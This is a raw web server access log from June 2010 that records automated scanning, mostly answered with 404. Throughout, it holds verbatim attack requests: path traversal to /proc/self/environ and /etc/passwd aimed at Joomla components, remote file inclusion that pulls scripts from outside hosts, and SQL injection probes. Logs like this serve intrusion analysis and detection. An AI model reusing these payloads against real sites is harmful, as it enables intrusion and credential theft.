207.46.13.49 - - [10/Jun/2010:04:19:08 -0500] "GET /logs/access_log.1257552000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.135.228.230 - - [10/Jun/2010:04:19:14 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
79.170.45.162 - - [10/Jun/2010:04:19:29 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:19:29 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:19:30 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:19:41 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:19:41 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:19:42 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
67.159.31.10 - - [10/Jun/2010:04:22:06 -0500] "GET /logs/*./?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-""libwww-perl/5.810"
67.159.31.10 - - [10/Jun/2010:04:22:06 -0500] "GET /*./?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 287 "-""libwww-perl/5.810"
88.191.94.188 - - [10/Jun/2010:04:23:02 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [10/Jun/2010:04:23:02 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [10/Jun/2010:04:23:02 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [10/Jun/2010:04:23:02 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
78.110.50.139 - - [10/Jun/2010:04:23:34 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
78.110.50.139 - - [10/Jun/2010:04:23:34 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
222.236.47.182 - - [10/Jun/2010:04:24:05 -0500] "GET /logs/access_log.1271548800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://antony.freewebhostx.com/data/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
78.110.50.139 - - [10/Jun/2010:04:24:38 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
78.110.50.139 - - [10/Jun/2010:04:24:39 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.249.71.144 - - [10/Jun/2010:04:25:19 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.135.228.230 - - [10/Jun/2010:04:26:13 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
200.135.228.230 - - [10/Jun/2010:04:26:13 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
200.135.228.230 - - [10/Jun/2010:04:26:13 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
200.135.228.230 - - [10/Jun/2010:04:26:28 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
200.135.228.230 - - [10/Jun/2010:04:26:28 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
200.135.228.230 - - [10/Jun/2010:04:26:29 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
212.241.179.30 - - [10/Jun/2010:04:27:53 -0500] "GET /logs//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
212.241.179.30 - - [10/Jun/2010:04:27:54 -0500] "GET /logs//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
212.241.179.30 - - [10/Jun/2010:04:27:54 -0500] "GET //index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
212.241.179.30 - - [10/Jun/2010:04:27:54 -0500] "GET //index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
200.135.228.230 - - [10/Jun/2010:04:28:19 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
89.31.116.11 - - [10/Jun/2010:04:28:27 -0500] "GET /logs/access_log.1274572800/*.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:28:27 -0500] "GET /*.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:28:28 -0500] "GET /logs/*.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:28:36 -0500] "GET /logs/access_log.1274572800/*.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:28:36 -0500] "GET /*.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:28:37 -0500] "GET /logs/*.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
216.227.215.115 - - [10/Jun/2010:04:28:48 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
216.227.215.115 - - [10/Jun/2010:04:28:48 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
216.227.215.115 - - [10/Jun/2010:04:28:48 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
216.227.215.115 - - [10/Jun/2010:04:28:49 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
216.227.215.115 - - [10/Jun/2010:04:28:49 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
216.227.215.115 - - [10/Jun/2010:04:28:49 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
91.203.68.45 - - [10/Jun/2010:04:29:48 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:04:29:49 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:04:29:52 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:04:29:52 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
200.135.228.230 - - [10/Jun/2010:04:30:07 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
91.203.68.45 - - [10/Jun/2010:04:30:07 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:04:30:08 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.200.169.108 - - [10/Jun/2010:04:30:10 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
188.95.112.72 - - [10/Jun/2010:04:30:10 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.foroptimalhealth.com/modules/dtree/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
188.95.112.72 - - [10/Jun/2010:04:30:10 -0500] "GET /logs/access_log.1271548800/e404.php?DOCUMENT_ROOT=http://www.foroptimalhealth.com/modules/dtree/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
188.95.112.72 - - [10/Jun/2010:04:30:10 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.foroptimalhealth.com/modules/dtree/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
89.200.169.108 - - [10/Jun/2010:04:30:10 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.203.68.45 - - [10/Jun/2010:04:30:25 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:04:30:25 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.200.169.108 - - [10/Jun/2010:04:30:41 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:30:41 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
200.135.228.230 - - [10/Jun/2010:04:30:52 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
89.200.169.108 - - [10/Jun/2010:04:31:18 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:31:18 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.227.215.115 - - [10/Jun/2010:04:31:35 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
216.227.215.115 - - [10/Jun/2010:04:31:35 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
89.200.169.108 - - [10/Jun/2010:04:31:46 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:31:47 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
79.170.45.162 - - [10/Jun/2010:04:32:37 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:32:43 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:32:52 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:32:54 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:33:13 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:33:13 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:33:36 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:33:37 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:34:05 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:34:05 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:34:06 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:34:06 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:34:15 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:34:15 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:34:30 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:34:30 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
202.190.174.181 - - [10/Jun/2010:04:36:04 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/PHP.php?mosConfig_absolute_path=http://www.sdit-alfirdaus.sch.id/components/com_sef/1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
202.190.174.181 - - [10/Jun/2010:04:36:04 -0500] "GET /logs/access_log.1273363200//components/com_fabrik/libs/Blowfish/PHP.php?mosConfig_absolute_path=http://www.sdit-alfirdaus.sch.id/components/com_sef/1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
202.190.174.181 - - [10/Jun/2010:04:36:04 -0500] "GET //components/com_fabrik/libs/Blowfish/PHP.php?mosConfig_absolute_path=http://www.sdit-alfirdaus.sch.id/components/com_sef/1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
67.159.31.10 - - [10/Jun/2010:04:36:43 -0500] "GET /logs/*./modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
67.159.31.10 - - [10/Jun/2010:04:36:43 -0500] "GET /*./modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
67.159.31.10 - - [10/Jun/2010:04:37:13 -0500] "GET /logs/*./modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
67.159.31.10 - - [10/Jun/2010:04:37:13 -0500] "GET /*./modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
89.31.116.11 - - [10/Jun/2010:04:38:23 -0500] "GET /*.php?option=com_alphauserpoints&view=' HTTP/1.1" 404 289 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:38:25 -0500] "GET /*.php?option=com_alphauserpoints&view=' HTTP/1.1" 404 289 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:38:36 -0500] "GET /logs/access_log.1274572800/*.php?option=com_alphauserpoints&view=' HTTP/1.1" 404 316 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:38:36 -0500] "GET /*.php?option=com_alphauserpoints&view=' HTTP/1.1" 404 289 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:38:37 -0500] "GET /logs/*.php?option=com_alphauserpoints&view=' HTTP/1.1" 404 294 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:38:39 -0500] "GET /logs/access_log.1274572800/*.php?option=com_alphauserpoints&view=' HTTP/1.1" 404 316 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:38:40 -0500] "GET /*.php?option=com_alphauserpoints&view=' HTTP/1.1" 404 289 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:38:40 -0500] "GET /logs/*.php?option=com_alphauserpoints&view=' HTTP/1.1" 404 294 "-""libwww-perl/5.832"
202.190.174.181 - - [10/Jun/2010:04:39:11 -0500] "GET /logs/access_log.1274572800//components/com_fabrik/libs/Blowfish/PHP.php?mosConfig_absolute_path=http://www.sdit-alfirdaus.sch.id/components/com_sef/1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
212.241.179.30 - - [10/Jun/2010:04:40:04 -0500] "GET /logs/access_log.1274572800//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
212.241.179.30 - - [10/Jun/2010:04:40:04 -0500] "GET //index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
212.241.179.30 - - [10/Jun/2010:04:40:04 -0500] "GET /logs//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
212.241.179.30 - - [10/Jun/2010:04:40:30 -0500] "GET /logs/access_log.1274572800//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
212.241.179.30 - - [10/Jun/2010:04:40:31 -0500] "GET //index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
212.241.179.30 - - [10/Jun/2010:04:40:31 -0500] "GET /logs//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
202.63.240.21 - - [10/Jun/2010:04:41:15 -0500] "GET /logs/access_log.1238803200/skins/advanced/advanced1.php?pluginpath[0]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 339 "-""libwww-perl/5.835"
202.63.240.21 - - [10/Jun/2010:04:41:16 -0500] "GET /skins/advanced/advanced1.php?pluginpath[0]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.835"
202.63.240.21 - - [10/Jun/2010:04:41:17 -0500] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.835"
89.31.116.11 - - [10/Jun/2010:04:41:57 -0500] "GET /*.php?option=com_alphauserpoints&view=' HTTP/1.1" 404 289 "-""libwww-perl/5.832"
202.190.174.181 - - [10/Jun/2010:04:46:04 -0500] "GET //components/com_fabrik/libs/Blowfish/PHP.php?mosConfig_absolute_path=http://www.sdit-alfirdaus.sch.id/components/com_sef/1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
202.190.174.181 - - [10/Jun/2010:04:46:04 -0500] "GET /logs/access_log.1273363200%20%20//components/com_fabrik/libs/Blowfish/PHP.php?mosConfig_absolute_path=http://www.sdit-alfirdaus.sch.id/components/com_sef/1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
202.190.174.181 - - [10/Jun/2010:04:46:04 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/PHP.php?mosConfig_absolute_path=http://www.sdit-alfirdaus.sch.id/components/com_sef/1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
89.31.116.11 - - [10/Jun/2010:04:46:37 -0500] "GET /*.php?option=com_alphauserpoints&view=' HTTP/1.1" 404 289 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:46:45 -0500] "GET /*.php?option=com_alphauserpoints&view=' HTTP/1.1" 404 289 "-""libwww-perl/5.832"
200.135.228.230 - - [10/Jun/2010:04:47:34 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
